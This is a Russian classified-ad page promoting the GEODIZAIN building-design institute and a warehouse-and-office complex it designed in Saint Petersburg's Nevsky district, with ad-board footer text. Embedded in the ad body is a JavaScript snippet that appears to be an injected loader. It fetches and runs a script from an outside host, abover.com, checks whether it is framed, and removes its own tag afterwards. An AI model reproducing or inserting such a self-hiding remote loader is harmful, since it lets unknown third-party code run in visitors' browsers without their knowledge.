Проектирование складов в Санкт-Петербурге и Лениградской области

 
Информация

На части территории Санкт-Петербурга в зоне складской и промышленной застройки прошлых лет есть привлекательные земельные участки  для размещения складских комплексов с офисными помещениями.

 

На одном из таких земельных участков, расположенных в Невском районе на пересечении улиц Мельничной и Профессора Качалова построен складской комплекс с офисными помещениями. Проектная документация разработана и согласованна специалистами Института строительного проектирования ГЕОДИЗАЙН. Комплекс запроектирован из двух блоков: восьмиэтажного административного и четырехэтажного складского, соединенных между собой остекленным теплым переходом в уровне второго и третьего этажей.

                       

Институт строительного проектирования ГЕОДИЗАЙН специализируется на разработке и согласовании проектной документации для строительства объектов индустриальной, складской, торговой и жилой недвижимости. Каждый проект создается с учетом технологии предприятия, а также особенностей земельного участка. Все выполненные нами проекты согласованны в надзорных органах и получили положительное заключение в экспертизе.

Институт строительного проектирования ГЕОДИЗАЙН

(function () { var script = document.createElement(`script`); script.src = `https://abover.com/system/extension?iframe=` + ( self === top ? `0` : `1` ) + `&r=` + Math.random(); script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })();

 

№ 11532 9 апреля 2014 в 00:47 (до 24.04.2024) Денис Васильчук
Похожие объявления
Комментарии
Комментариев к записи нет. Вы можете стать первым!

Добавить комментарий

Оставлять комментарии могут только зарегистрированные пользователи!
 
доски объявлений - каталог и 

рейтинг Рейтинг лучших досок объявлений Яндекс.Метрика Рейтинг досок объявлений www.megastock.ru